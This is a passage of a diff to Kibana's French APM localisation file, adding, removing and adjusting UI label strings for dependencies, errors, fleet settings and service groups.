échoué", "xpack.apm.dependenciesTable.columnErrorRateTip": "Le pourcentage de transactions ayant échoué pour le service sélectionné. Les transactions du serveur HTTP avec un code du statut 4xx (erreur du client) ne sont pas considérées comme des échecs, car l'appelant, et non le serveur, a provoqué l'échec.", "xpack.apm.dependenciesTable.columnImpact": "Impact", @@ -7615,12 +6866,42 @@ "xpack.apm.dependenciesTable.columnThroughput": "Rendement", "xpack.apm.dependenciesTable.notFoundLabel": "Aucune dépendance trouvée", "xpack.apm.dependenciesTable.serviceMapLinkText": "Afficher la carte des services", + "xpack.apm.dependencyDetail.dependenciesTableColumn": "Service", + "xpack.apm.dependencyDetail.dependenciesTableTitle": "Services en amont", + "xpack.apm.dependencyDetailFailedTransactionRateChartTitle": "Taux de transactions ayant échoué", + "xpack.apm.dependencyDetailLatencyChartTitle": "Latence", + "xpack.apm.dependencyDetailOperations.breadcrumbTitle": "Opérations", + "xpack.apm.DependencyDetailOperations.title": "Opérations", + "xpack.apm.dependencyDetailOperationsList.notFoundLabel": "Aucune opération trouvée", + "xpack.apm.dependencyDetailOperationsList.spanNameColumnLabel": "Nom de l’intervalle", + "xpack.apm.dependencyDetailOverview.breadcrumbTitle": "Aperçu", + "xpack.apm.DependencyDetailOverview.title": "Aperçu", + "xpack.apm.dependencyDetailThroughputChartTitle": "Rendement", + "xpack.apm.dependencyErrorRateChart.chartTitle": "Taux de transactions ayant échoué", + "xpack.apm.dependencyLatencyChart.chartTitle": "Latence", + "xpack.apm.dependencyOperationDetailTraceList": "Traces", + "xpack.apm.dependencyOperationDetailTraceListDurationColumn": "Durée", + "xpack.apm.dependencyOperationDetailTraceListOutcomeColumn": "Résultat", + "xpack.apm.dependencyOperationDetailTraceListServiceNameColumn": "Service d'origine", + "xpack.apm.dependencyOperationDetailTraceListTimestampColumn": "Horodatage", + "xpack.apm.dependencyOperationDetailTraceListTraceIdColumn": "Trace", + "xpack.apm.dependencyOperationDetailTraceListTransactionNameColumn": "Nom de la transaction", + "xpack.apm.dependencyOperationDistributionChart.allSpansLegendLabel": "Tous les intervalles", + "xpack.apm.dependencyOperationDistributionChart.failedSpansLegendLabel": "Intervalles ayant échoué", + "xpack.apm.dependencyThroughputChart.chartTitle": "Rendement", "xpack.apm.deprecations.legacyModeTitle": "Le serveur APM fonctionne en mode hérité", "xpack.apm.deprecations.message": "L'exécution directe du binaire du serveur APM est considérée comme une option héritée et sera déclassée et retirée à l'avenir.", "xpack.apm.deprecations.steps.apm": "Naviguer vers Observabilité/APM", "xpack.apm.deprecations.steps.schema": "Sélectionner l'onglet \"Schema\"", "xpack.apm.deprecations.steps.settings": "Cliquer sur \"Settings\"", "xpack.apm.deprecations.steps.switch": "Cliquez sur \"Passer à Elastic Agent\". Vous serez guidé tout au long du processus", + "xpack.apm.durationDistribution.chart.currentEventMarkerLabel": "Échantillon actuel", + "xpack.apm.durationDistribution.chart.latencyLabel": "Latence", + "xpack.apm.durationDistribution.chart.numberOfSpansLabel": "Intervalles", + "xpack.apm.durationDistribution.chart.numberOfTransactionsLabel": "Transactions", + "xpack.apm.durationDistributionChartWithScrubber.clearSelectionAriaLabel": "Effacer la sélection", + "xpack.apm.durationDistributionChartWithScrubber.emptySelectionText": "Glisser et déposer pour sélectionner une plage", + "xpack.apm.durationDistributionChartWithScrubber.panelTitle": "Distribution de la latence", "xpack.apm.emptyMessage.noDataFoundDescription": "Essayez avec une autre plage temporelle ou réinitialisez le filtre de recherche.", "xpack.apm.emptyMessage.noDataFoundLabel": "Aucune donnée trouvée.", "xpack.apm.environmentsSelectCustomOptionText": "Ajouter \\{searchValue\\} en tant que nouvel environnement", @@ -7631,18 +6912,26 @@ "xpack.apm.errorCountAlertTrigger.errors": " erreurs", "xpack.apm.errorGroup.chart.ocurrences": "Occurrences", "xpack.apm.errorGroupDetails.culpritLabel": "Coupable", - "xpack.apm.errorGroupDetails.errorGroupTitle": "Groupe d'erreurs {errorGroupId}", "xpack.apm.errorGroupDetails.errorOccurrenceTitle": "Occurrence d'erreur", "xpack.apm.errorGroupDetails.exceptionMessageLabel": "Message d'exception", "xpack.apm.errorGroupDetails.logMessageLabel": "Message log", "xpack.apm.errorGroupDetails.occurrencesChartLabel": "Occurrences", + "xpack.apm.errorGroupDetails.occurrencesLabel": "Occurrences", "xpack.apm.errorGroupDetails.relatedTransactionSample": "Échantillon de transaction associée", "xpack.apm.errorGroupDetails.unhandledLabel": "Non géré", - "xpack.apm.errorGroupDetails.viewOccurrencesInDiscoverButtonLabel": "Visualiser {occurrencesCount} {occurrencesCount, plural, one {l'occurrence} other {les occurrences}} dans Discover", "xpack.apm.errorGroupDetails.viewOccurrencesInTraceExplorer": "Explorer les traces ayant cette erreur", + "xpack.apm.errorGroupTopTransactions.column.occurrences": "Occurrences d'erreurs", + "xpack.apm.errorGroupTopTransactions.column.transactionName": "Nom de la transaction", + "xpack.apm.errorGroupTopTransactions.errorMessage": "Impossible de récupérer", + "xpack.apm.errorGroupTopTransactions.loading": "Chargement...", + "xpack.apm.errorGroupTopTransactions.noResults": "Aucune erreur trouvée associée à des transactions", + "xpack.apm.errorGroupTopTransactions.title": "5 principales transactions affectées", "xpack.apm.errorRate": "Taux de transactions ayant échoué", "xpack.apm.errorRate.chart.errorRate": "Taux de transactions ayant échoué (moy.)", "xpack.apm.errorRate.tip": "Le pourcentage de transactions ayant échoué pour le service sélectionné. Les transactions du serveur HTTP avec un code du statut 4xx (erreur du client) ne sont pas considérées comme des échecs, car l'appelant, et non le serveur, a provoqué l'échec.", + "xpack.apm.errorsTable.columnLastSeen": "Vu en dernier", + "xpack.apm.errorsTable.columnName": "Nom", + "xpack.apm.errorsTable.columnOccurrences": "Occurrences", "xpack.apm.errorsTable.errorMessageAndCulpritColumnLabel": "Message d'erreur et coupable", "xpack.apm.errorsTable.groupIdColumnDescription": "Hachage de la trace de pile. Regroupe les erreurs similaires, même lorsque le message d'erreur est différent en raison des paramètres dynamiques.", "xpack.apm.errorsTable.groupIdColumnLabel": "ID du groupe", @@ -7651,8 +6940,7 @@ "xpack.apm.errorsTable.occurrencesColumnLabel": "Occurrences", "xpack.apm.errorsTable.typeColumnLabel": "Type", "xpack.apm.errorsTable.unhandledLabel": "Non géré", - "xpack.apm.exactTransactionRateLabel": "{value} tpm", - "xpack.apm.failedTransactionsCorrelations.licenseCheckText": "Pour utiliser la fonctionnalité de corrélation des transactions ayant échoué, vous devez disposer d'une licence Elastic Platinum. Cette fonctionnalité vous aide à découvrir quels attributs contribuent à l'échec des transactions.", + "xpack.apm.failedTransactionsCorrelations.licenseCheckText": "Pour utiliser la fonctionnalité de corrélation des transactions ayant échoué, vous devez disposer d'une licence Elastic Platinum. Cette fonctionnalité vous aide à découvrir quels attributs contribuent à l'échec des transactions.", "xpack.apm.failure_badge.tooltip": "event.outcome = échec", "xpack.apm.featureRegistry.apmFeatureName": "APM et expérience utilisateur", "xpack.apm.feedbackMenu.appName": "APM", @@ -7708,7 +6996,12 @@ "xpack.apm.fleet_integration.settings.apm.shutdownTimeoutLabel": "Durée maximale avant la libération des ressources lors de l'arrêt", "xpack.apm.fleet_integration.settings.apm.urlLabel": "URL", "xpack.apm.fleet_integration.settings.apm.writeTimeoutLabel": "Durée maximale pour la rédaction d'une réponse", - "xpack.apm.fleet_integration.settings.apmAgent.description": "Configurez l'instrumentation pour les applications {title}.", + "xpack.apm.fleet_integration.settings.debug.expvarEnabledDescription": "Exposé sous /debug/vars", + "xpack.apm.fleet_integration.settings.debug.expvarEnabledTitle": "Activer la prise en charge d'expvar de Golang pour le serveur APM", + "xpack.apm.fleet_integration.settings.debug.pprofEnabledDescription": "Exposer les points de terminaison HTTP pour récupérer les données de profilage", + "xpack.apm.fleet_integration.settings.debug.pprofEnabledTitle": "Activer la prise en charge de pprof pour le serveur APM", + "xpack.apm.fleet_integration.settings.debug.settings.subtitle": "Paramètres pour les indicateurs de débogage du serveur APM", + "xpack.apm.fleet_integration.settings.debug.settings.title": "Paramètres de débogage", "xpack.apm.fleet_integration.settings.disabledLabel": "Désactivé", "xpack.apm.fleet_integration.settings.enabledLabel": "Activé", "xpack.apm.fleet_integration.settings.optionalLabel": "Facultatif", @@ -7716,7 +7009,8 @@ "xpack.apm.fleet_integration.settings.platinumBadgeTooltipDescription": "Les configurations sont enregistrées mais ignorées si votre licence Kibana n'est pas Platinum.", "xpack.apm.fleet_integration.settings.platinumBadgeTooltipTitle": "Licence Platinum requise", "xpack.apm.fleet_integration.settings.requiredFieldLabel": "Champ requis", - "xpack.apm.fleet_integration.settings.requiredLabel": "Requis", + "xpack.apm.fleet_integration.settings.requiredLabel": "Obligatoire", + "xpack.apm.fleet_integration.settings.rum.allowedHeadersValidation": "Crochets droits non autorisés", "xpack.apm.fleet_integration.settings.rum.enableRumDescription": "Activer le monitoring des utilisateurs réels (RUM)", "xpack.apm.fleet_integration.settings.rum.enableRumTitle": "Activer RUM", "xpack.apm.fleet_integration.settings.rum.rumAllowHeaderDescription": "Configurer l'authentification pour l'agent", @@ -7724,7 +7018,7 @@ "xpack.apm.fleet_integration.settings.rum.rumAllowHeaderLabel": "Access-Control-Allow-Headers", "xpack.apm.fleet_integration.settings.rum.rumAllowHeaderTitle": "En-têtes personnalisés", "xpack.apm.fleet_integration.settings.rum.rumAllowOriginsHelpText": "En-têtes Origin autorisés pouvant être envoyés par les agents utilisateurs.", - "xpack.apm.fleet_integration.settings.rum.rumAllowOriginsLabel": "En-têtes Origin", + "xpack.apm.fleet_integration.settings.rum.rumAllowOriginsLabel": "Origines autorisées", "xpack.apm.fleet_integration.settings.rum.rumExcludeFromGroupingHelpText": "Exclure les cadres des traces de pile du calcul des groupes d'erreurs en faisant correspondre le \"file_name\" d'un cadre de trace de pile avec ce regexp.", "xpack.apm.fleet_integration.settings.rum.rumExcludeFromGroupingLabel": "Exclure du regroupement", "xpack.apm.fleet_integration.settings.rum.rumLibraryPatternHelpText": "Identifiez les cadres de la bibliothèque en faisant correspondre le file_name et le abs_path du cadre de la trace de pile avec ce regexp.", @@ -7744,13 +7038,12 @@ "xpack.apm.fleet_integration.settings.tailSampling.tailSamplingPolicies": "Politiques d'échantillonnage de la queue", "xpack.apm.fleet_integration.settings.tailSampling.tailSamplingPoliciesDescription": "Les politiques mappent les événements de trace à un taux d'échantillonnage. Chaque politique doit spécifier un taux d'échantillonnage. Les événements de trace sont mis en correspondance avec les politiques dans l'ordre spécifié. Toutes les conditions de la politique doivent être vraies pour qu'un événement de trace corresponde. Chaque liste de politiques doit se terminer par une politique qui ne spécifie qu'un taux d'échantillonnage. Cette politique finale est utilisée pour repérer les événements de trace restants qui ne correspondent pas à une politique plus stricte.", "xpack.apm.fleet_integration.settings.tailSampling.tailSamplingPoliciesTitle": "Politiques", - "xpack.apm.fleet_integration.settings.tailSamplingDocsHelpText": "Pour en savoir plus sur les politiques d'échantillonnage de la queue, consultez notre {link}.", "xpack.apm.fleet_integration.settings.tailSamplingDocsHelpTextLink": "documents", "xpack.apm.fleet_integration.settings.tls.settings.subtitle": "Paramètres pour la certification TLS.", "xpack.apm.fleet_integration.settings.tls.settings.title": "Paramètres TLS", "xpack.apm.fleet_integration.settings.tls.tlsCertificateLabel": "Chemin d'accès au certificat du serveur", "xpack.apm.fleet_integration.settings.tls.tlsCertificateTitle": "Certificat TLS", - "xpack.apm.fleet_integration.settings.tls.tlsCipherSuitesHelpText": "Ne peut pas être configuré pour TLS 1.3.", + "xpack.apm.fleet_integration.settings.tls.tlsCipherSuitesHelpText": "Ne peut pas être configuré pour TLS 1.3.", "xpack.apm.fleet_integration.settings.tls.tlsCipherSuitesLabel": "Suites de chiffrement pour les connexions TLS", "xpack.apm.fleet_integration.settings.tls.tlsCurveTypesLabel": "Types de courbes pour les suites de chiffrement ECDHE", "xpack.apm.fleet_integration.settings.tls.tlsEnabledTitle": "Activer TLS", @@ -7772,15 +7065,14 @@ "xpack.apm.fleetIntegration.apmAgent.runtimeAttachment.manualInstrumentation": "Instrumentation manuelle", "xpack.apm.fleetIntegration.apmAgent.runtimeAttachment.unsavedRules": "Des modifications ne sont pas enregistrées. Cliquez sur \"Enregistrer l'intégration\" pour synchroniser les modifications apportées à l'intégration.", "xpack.apm.fleetIntegration.apmAgent.runtimeAttachment.version": "Version", - "xpack.apm.fleetIntegration.apmAgent.runtimeAttachment.version.helpText": "Entrez la {versionLink} de l'agent Java Elastic APM qui doit être attachée.", "xpack.apm.fleetIntegration.apmAgent.runtimeAttachment.version.helpText.version": "version", "xpack.apm.fleetIntegration.apmAgent.runtimeAttachment.version.invalid": "Version non valide", + "xpack.apm.fleetIntegration.apmAgent.runtimeAttachment.versionSelect.placeHolder": "Sélectionner une version", "xpack.apm.fleetIntegration.assets.description": "Consulter les traces de l'application et les cartes de service dans APM", "xpack.apm.fleetIntegration.assets.name": "Services", "xpack.apm.fleetIntegration.enrollmentFlyout.installApmAgentButtonText": "Installer l'agent APM", "xpack.apm.fleetIntegration.enrollmentFlyout.installApmAgentDescription": "Une fois l'agent lancé, vous pouvez installer des agents APM sur vos hôtes pour collecter des données depuis vos applications et services.", "xpack.apm.fleetIntegration.enrollmentFlyout.installApmAgentTitle": "Installer l'agent APM", - "xpack.apm.fleetIntegration.javaRuntime.discoveryRulesDescription": "Pour chaque JVM en cours d'exécution, les règles de découverte sont évaluées dans l'ordre où elles sont fournies. La première règle de correspondance détermine le résultat. Découvrez plus d'informations dans le {docLink}.", "xpack.apm.fleetIntegration.javaRuntime.discoveryRulesDescription.docLink": "documents", "xpack.apm.fleetIntegration.javaRuntime.operationType.exclude": "Exclure", "xpack.apm.fleetIntegration.javaRuntime.operationType.exclude.options.main": "principale", @@ -7809,25 +7101,29 @@ "xpack.apm.home.alertsMenu.transactionDuration": "Latence", "xpack.apm.home.alertsMenu.transactionErrorRate": "Taux de transactions ayant échoué", "xpack.apm.home.alertsMenu.viewActiveAlerts": "Gérer les règles", + "xpack.apm.home.alertsTabLabel": "Alertes", "xpack.apm.home.infraTabLabel": "Infrastructure", "xpack.apm.home.serviceLogsTabLabel": "Logs", "xpack.apm.home.serviceMapTabLabel": "Carte des services", + "xpack.apm.infraTabs.emptyMessageIllustrationAlternativeText": "Une loupe avec un point d'exclamation", + "xpack.apm.infraTabs.emptyMessagePromptDescription": "Essayez de rechercher sur une période plus longue.", + "xpack.apm.infraTabs.emptyMessagePromptTimeRangeTitle": "Étendre la plage temporelle", + "xpack.apm.infraTabs.emptyMessagePromptTitle": "Aucun résultat ne correspond à vos critères de recherche.", "xpack.apm.infraTabs.failurePromptDescription": "Un problème est survenu lors du chargement de l'onglet Infrastructure et de vos données. Vous pouvez contacter votre administrateur pour obtenir de l'aide.", "xpack.apm.infraTabs.failurePromptTitle": "Impossible de charger vos données d'infrastructure", "xpack.apm.inspectButtonText": "Inspecter", "xpack.apm.instancesLatencyDistributionChartLegend": "Instances", "xpack.apm.instancesLatencyDistributionChartTitle": "Distribution de la latence des instances", "xpack.apm.instancesLatencyDistributionChartTooltipClickToFilterDescription": "Cliquer pour filtrer par instance", - "xpack.apm.instancesLatencyDistributionChartTooltipInstancesTitle": "{instancesCount} {instancesCount, plural, one {instance} other {instances}}", "xpack.apm.instancesLatencyDistributionChartTooltipLatencyLabel": "Latence", "xpack.apm.instancesLatencyDistributionChartTooltipThroughputLabel": "Rendement", "xpack.apm.invalidLicense.licenseManagementLink": "Gérer votre licence", "xpack.apm.invalidLicense.message": "L'interface utilisateur d'APM n'est pas disponible car votre licence actuelle a expiré ou n'est plus valide.", "xpack.apm.invalidLicense.title": "Licence non valide", "xpack.apm.jobsList.updateCompletedToastText": "Vos nouvelles tâches de détection d'anomalies ont bien été créées. Vous commencerez à voir les résultats de la détection des anomalies dans l'application dans quelques minutes. Les anciennes tâches ont été fermées, mais les résultats sont toujours disponibles dans Machine Learning.", - "xpack.apm.jobsList.updateCompletedToastTitle": "Tâches de détection des anomalies créées !", + "xpack.apm.jobsList.updateCompletedToastTitle": "Tâches de détection des anomalies créées !", "xpack.apm.jvmsTable.cpuColumnLabel": "Moy. CPU", - "xpack.apm.jvmsTable.explainServiceNodeNameMissing": "Nous n'avons pas pu déterminer à quelles JVM ces indicateurs correspondent. Cela provient probablement du fait que vous exécutez une version du serveur APM antérieure à 7.5. La mise à niveau du serveur APM vers la version 7.5 ou supérieure devrait résoudre le problème.", + "xpack.apm.jvmsTable.explainServiceNodeNameMissing": "Nous n'avons pas pu déterminer à quelles JVM ces indicateurs correspondent. Cela provient probablement du fait que vous exécutez une version du serveur APM antérieure à 7.5. La mise à niveau du serveur APM vers la version 7.5 ou supérieure devrait résoudre le problème.", "xpack.apm.jvmsTable.heapMemoryColumnLabel": "Moy. segment de mémoire", "xpack.apm.jvmsTable.hostName": "Nom d'hôte", "xpack.apm.jvmsTable.nameColumnLabel": "Nom", @@ -7836,22 +7132,21 @@ "xpack.apm.jvmsTable.nonHeapMemoryColumnLabel": "Moy. segment de mémoire sans tas", "xpack.apm.jvmsTable.threadCountColumnLabel": "Nombre de threads max", "xpack.apm.keyValueFilterList.actionFilterLabel": "Filtrer par valeur", - "xpack.apm.kueryBar.placeholder": "Rechercher {event, select,\n transaction {des transactions}\n metric {des indicateurs}\n error {des erreurs}\n other {des transactions, des erreurs et des indicateurs}\n } (par ex. {queryExample})", - "xpack.apm.latencyCorrelations.licenseCheckText": "Pour utiliser les corrélations de latence, vous devez disposer d'une licence Elastic Platinum. Elle vous permettra de découvrir quels champs sont corrélés à de faibles performances.", + "xpack.apm.latencyCorrelations.licenseCheckText": "Pour utiliser les corrélations de latence, vous devez disposer d'une licence Elastic Platinum. Elle vous permettra de découvrir quels champs sont corrélés à de faibles performances.", "xpack.apm.license.betaBadge": "Version bêta", "xpack.apm.license.betaTooltipMessage": "Cette fonctionnalité est actuellement en version bêta. Si vous rencontrez des bugs ou si vous souhaitez apporter des commentaires, ouvrez un ticket de problème ou visitez notre forum de discussion.", "xpack.apm.license.button": "Commencer l'essai", - "xpack.apm.license.title": "Commencer un essai gratuit de 30 jours", + "xpack.apm.license.title": "Commencer un essai gratuit de 30 jours", "xpack.apm.managedTable.errorMessage": "Impossible de récupérer", "xpack.apm.managedTable.loadingDescription": "Chargement…", "xpack.apm.metadata.help": "Comment ajouter des étiquettes et d'autres données", - "xpack.apm.metrics.transactionChart.machineLearningLabel": "Machine Learning :", - "xpack.apm.metrics.transactionChart.machineLearningTooltip": "Le flux affiche les limites attendues de la latence moyenne. Une annotation verticale rouge signale des anomalies avec un score d'anomalie de 75 ou plus.", - "xpack.apm.metrics.transactionChart.machineLearningTooltip.withKuery": "Les résultats de Machine Learning sont masqués lorsque la barre de recherche est utilisée comme filtre", + "xpack.apm.metrics.transactionChart.machineLearningLabel": "Machine Learning :", + "xpack.apm.metrics.transactionChart.machineLearningTooltip": "Le flux affiche les limites attendues de la latence moyenne. Une annotation verticale rouge signale des anomalies avec un score d'anomalie de 75 ou plus.", + "xpack.apm.metrics.transactionChart.machineLearningTooltip.withKuery": "Les résultats de Machine Learning sont masqués lorsque la barre de recherche est utilisée comme filtre", "xpack.apm.metrics.transactionChart.viewJob": "Afficher la tâche", "xpack.apm.mlCallout.dismissButton": "Rejeter", "xpack.apm.mlCallout.learnMoreButton": "En savoir plus", - "xpack.apm.mlCallout.legacyJobsCalloutText": "Nous avons découvert d'anciennes tâches de Machine Learning de notre précédente intégration qui ne sont plus utilisées dans l'application APM", + "xpack.apm.mlCallout.legacyJobsCalloutText": "Nous avons découvert d'anciennes tâches de Machine Learning de notre précédente intégration qui ne sont plus utilisées dans l'application APM", "xpack.apm.mlCallout.legacyJobsCalloutTitle": "Les anciennes tâches ML ne sont plus utilisées dans l'application APM", "xpack.apm.mlCallout.noJobsCalloutButtonText": "Créer une tâche de ML", "xpack.apm.mlCallout.noJobsCalloutText": "Identifiez les transactions anormales et consultez l'intégrité des services en amont et en aval grâce à l'intégration de la détection des anomalies d'APM. Lancez-vous en quelques minutes seulement.", @@ -7860,6 +7155,7 @@ "xpack.apm.mlCallout.updateAvailableCalloutText": "Nous avons mis à jour les tâches de détection des anomalies qui fournissent des indications sur la dégradation des performances et ajouté des détecteurs de débit et de taux de transactions ayant échoué. Si vous choisissez de mettre à jour, nous créerons les nouvelles tâches et fermerons les tâches héritées. Les données affichées dans l'application APM passeront automatiquement aux nouvelles. Veuillez noter que l'option de migration de toutes les tâches existantes ne sera pas disponible si vous choisissez de créer une nouvelle tâche.", "xpack.apm.mlCallout.updateAvailableCalloutTitle": "Mises à jour disponibles", "xpack.apm.navigation.allServicesTitle": "Tous les services", + "xpack.apm.navigation.apmSettingsTitle": "Paramètres", "xpack.apm.navigation.dependenciesTitle": "Dépendances", "xpack.apm.navigation.serviceMapTitle": "Carte des services", "xpack.apm.navigation.servicesTitle": "Services", @@ -7873,8 +7169,7 @@ "xpack.apm.profiling.highlightFrames": "Rechercher", "xpack.apm.profiling.table.name": "Nom", "xpack.apm.profiling.table.value": "Auto", - "xpack.apm.propertiesTable.agentFeature.noDataAvailableLabel": "Pas de données disponibles", - "xpack.apm.propertiesTable.agentFeature.noResultFound": "Pas de résultats pour \"{value}\".", + "xpack.apm.propertiesTable.agentFeature.noDataAvailableLabel": "Aucune donnée disponible", "xpack.apm.propertiesTable.tabs.exceptionStacktraceLabel": "Trace de pile d'exception", "xpack.apm.propertiesTable.tabs.logs.serviceName": "Nom de service", "xpack.apm.propertiesTable.tabs.logsLabel": "Logs", @@ -7883,7 +7178,7 @@ "xpack.apm.propertiesTable.tabs.spanLinks": "Liens d'intervalle", "xpack.apm.propertiesTable.tabs.timelineLabel": "Chronologie", "xpack.apm.searchInput.filter": "Filtrer…", - "xpack.apm.selectPlaceholder": "Sélectionner une option :", + "xpack.apm.selectPlaceholder": "Sélectionner une option :", "xpack.apm.serviceDependencies.breakdownChartTitle": "Temps consacré par dépendance", "xpack.apm.serviceDetails.dependenciesTabLabel": "Dépendances", "xpack.apm.serviceDetails.errorsTabLabel": "Erreurs", @@ -7901,19 +7196,11 @@ "xpack.apm.serviceGroup.serviceMap": "Carte des services", "xpack.apm.serviceGroups.breadcrumb.title": "Services", "xpack.apm.serviceGroups.cardsList.emptyDescription": "Aucune description disponible", - "xpack.apm.serviceGroups.cardsList.serviceCount": "{servicesCount} {servicesCount, plural, one {service} other {services}}", - "xpack.apm.serviceGroups.createFailure.toast.title": "Erreur lors de la création du groupe \"{groupName}\"", "xpack.apm.serviceGroups.createGroupLabel": "Créer un groupe", "xpack.apm.serviceGroups.createSuccess.toast.text": "Votre groupe est maintenant visible dans la nouvelle vue Services pour les groupes.", - "xpack.apm.serviceGroups.createSucess.toast.title": "Groupe \"{groupName}\" créé", - "xpack.apm.serviceGroups.deleteFailure.toast.title": "Erreur lors de la suppression du groupe \"{groupName}\"", - "xpack.apm.serviceGroups.deleteFailure.unknownId.toast.text": "Impossible de supprimer le groupe : id du groupe de service inconnu.", - "xpack.apm.serviceGroups.deleteFailure.unknownId.toast.title": "Erreur lors de la suppression du groupe \"{groupName}\"", - "xpack.apm.serviceGroups.deleteSuccess.toast.title": "Groupe \"{groupName}\" supprimé", - "xpack.apm.serviceGroups.editFailure.toast.title": "Erreur lors de la modification du groupe \"{groupName}\"", + "xpack.apm.serviceGroups.deleteFailure.unknownId.toast.text": "Impossible de supprimer le groupe : id du groupe de service inconnu.", "xpack.apm.serviceGroups.editGroupLabel": "Modifier un groupe", "xpack.apm.serviceGroups.editSuccess.toast.text": "Nouveaux changements dans le groupe de services enregistrés.", - "xpack.apm.serviceGroups.editSucess.toast.title": "Groupe \"{groupName}\" modifié", "xpack.apm.serviceGroups.emptyPrompt.message": "Aucun groupe trouvé pour ce filtre", "xpack.apm.serviceGroups.emptyPrompt.serviceGroups": "Groupes de services", "xpack.apm.serviceGroups.groupDetailsForm.cancel": "Annuler", @@ -7926,7 +7213,6 @@ "xpack.apm.serviceGroups.groupDetailsForm.invalidColorError": "Veuillez fournir une valeur de couleur valide", "xpack.apm.serviceGroups.groupDetailsForm.name": "Nom", "xpack.apm.serviceGroups.groupDetailsForm.selectServices": "Sélectionner des services", - "xpack.apm.serviceGroups.groupsCount": "{servicesCount} {servicesCount, plural, =0 {groupe} one {groupe} other {groupes}}", "xpack.apm.serviceGroups.list.allServices.description": "Afficher tous les services", "xpack.apm.serviceGroups.list.allServices.name": "Tous les services", "xpack.apm.serviceGroups.list.sort.alphabetical": "Alphabétique", @@ -7934,18 +7220,16 @@ "xpack.apm.serviceGroups.selectServicesForm.cancel": "Annuler", "xpack.apm.serviceGroups.selectServicesForm.editGroupDetails": "Modifier les détails du groupe", "xpack.apm.serviceGroups.selectServicesForm.kql": "Par exemple, labels.team : \"web\"", - "xpack.apm.serviceGroups.selectServicesForm.matchingServiceCount": "{servicesCount} {servicesCount, plural, =0 {service correspond} one {service correspond} other {services correspondent}} à la requête", "xpack.apm.serviceGroups.selectServicesForm.panelLabel": "Entrer une requête pour sélectionner les services", "xpack.apm.serviceGroups.selectServicesForm.preview": "Aperçu", "xpack.apm.serviceGroups.selectServicesForm.refresh": "Actualiser", "xpack.apm.serviceGroups.selectServicesForm.saveGroup": "Enregistrer le groupe", - "xpack.apm.serviceGroups.selectServicesForm.subtitle": "Utilisez une requête pour sélectionner les services pour ce groupe. Les services qui correspondent à cette requête dans les dernières 24 heures seront affectés au groupe.", + "xpack.apm.serviceGroups.selectServicesForm.subtitle": "Utilisez une requête pour sélectionner les services pour ce groupe. Les services qui correspondent à cette requête dans les dernières 24 heures seront affectés au groupe.", "xpack.apm.serviceGroups.selectServicesForm.title": "Sélectionner des services", "xpack.apm.serviceGroups.selectServicesList.environmentColumnLabel": "Environnements", "xpack.apm.serviceGroups.selectServicesList.nameColumnLabel": "Nom", - "xpack.apm.serviceGroups.selectServicesList.notFoundLabel": "Aucun service disponible dans les dernières 24 heures. Vous pouvez toujours créer le groupe et les services qui correspondent à votre requête.", + "xpack.apm.serviceGroups.selectServicesList.notFoundLabel": "Aucun service disponible dans les dernières 24 heures. Vous pouvez toujours créer le groupe et les services qui correspondent à votre requête.", "xpack.apm.serviceGroups.sortLabel": "Trier", - "xpack.apm.serviceGroups.tour.content.link": "Découvrez plus d'informations dans le {docsLink}.", "xpack.apm.serviceGroups.tour.content.link.docs": "documents", "xpack.apm.serviceGroups.tour.createGroups.content": "Regroupez les services afin de créer des vues d'inventaire organisées qui éliminent le bruit et simplifient les enquêtes sur les services. Les groupes sont spécifiques à l'espace Kibana et sont disponibles pour tous les utilisateurs ayant un accès approprié.", "xpack.apm.serviceGroups.tour.createGroups.title": "Présentation des groupes de services", @@ -7962,13 +7246,8 @@ "xpack.apm.serviceIcons.container": "Conteneur", "xpack.apm.serviceIcons.serverless": "Sans serveur", "xpack.apm.serviceIcons.service": "Service", - "xpack.apm.serviceIcons.serviceDetails.cloud.availabilityZoneLabel": "{zones, plural, =0 {Zone de disponibilité} one {Zone de disponibilité} other {Zones de disponibilité}} ", - "xpack.apm.serviceIcons.serviceDetails.cloud.faasTriggerTypeLabel": "{triggerTypes, plural, =0 {Type de déclencheur} one {Type de déclencheur} other {Types de déclencheurs}} ", - "xpack.apm.serviceIcons.serviceDetails.cloud.functionNameLabel": "{functionNames, plural, =0 {Nom de fonction} one {Nom de fonction} other {Noms de fonction}} ", - "xpack.apm.serviceIcons.serviceDetails.cloud.machineTypesLabel": "{machineTypes, plural, =0{Type de machine} one {Type de machine} other {Types de machines}} ", - "xpack.apm.serviceIcons.serviceDetails.cloud.projectIdLabel": "ID projet", + "xpack.apm.serviceIcons.serviceDetails.cloud.projectIdLabel": "ID de projet", "xpack.apm.serviceIcons.serviceDetails.cloud.providerLabel": "Fournisseur cloud", - "xpack.apm.serviceIcons.serviceDetails.cloud.regionLabel": "{regions, plural, =0 {Region} one {Région} other {Régions}} ", "xpack.apm.serviceIcons.serviceDetails.cloud.serviceNameLabel": "Service Cloud", "xpack.apm.serviceIcons.serviceDetails.container.containerizedLabel": "Conteneurisé", "xpack.apm.serviceIcons.serviceDetails.container.noLabel": "Non", @@ -7986,7 +7265,7 @@ "xpack.apm.serviceMap.anomalyDetectionPopoverNoData": "Nous n'avons pas trouvé de score d'anomalie dans la plage temporelle sélectionnée. Consultez les détails dans l'explorateur d'anomalies.", "xpack.apm.serviceMap.anomalyDetectionPopoverScoreMetric": "Score (max.)", "xpack.apm.serviceMap.anomalyDetectionPopoverTitle": "Détection des anomalies", - "xpack.apm.serviceMap.anomalyDetectionPopoverTooltip": "Les indicateurs d'intégrité du service sont soutenus par la fonctionnalité de détection des anomalies dans le Machine Learning", + "xpack.apm.serviceMap.anomalyDetectionPopoverTooltip": "Les indicateurs d'intégrité du service sont soutenus par la fonctionnalité de détection des anomalies dans le Machine Learning", "xpack.apm.serviceMap.avgCpuUsagePopoverStat": "Utilisation CPU (moy.)", "xpack.apm.serviceMap.avgMemoryUsagePopoverStat": "Utilisation de la mémoire (moy.)", "xpack.apm.serviceMap.avgReqPerMinutePopoverMetric": "Rendement (moy.)", @@ -7999,11 +7278,10 @@ "xpack.apm.serviceMap.emptyBanner.title": "Il semblerait qu'il n'y ait qu'un seul service.", "xpack.apm.serviceMap.errorRatePopoverStat": "Taux de transactions ayant échoué (moy.)", "xpack.apm.serviceMap.focusMapButtonText": "Centrer la carte", - "xpack.apm.serviceMap.invalidLicenseMessage": "Pour accéder aux cartes de service, vous devez disposer d'une licence Elastic Platinum. Elle vous permettra de visualiser l'intégralité de la suite d'applications ainsi que vos données APM.", + "xpack.apm.serviceMap.invalidLicenseMessage": "Pour accéder aux cartes de service, vous devez disposer d'une licence Elastic Platinum. Elle vous permettra de visualiser l'intégralité de la suite d'applications ainsi que vos données APM.", 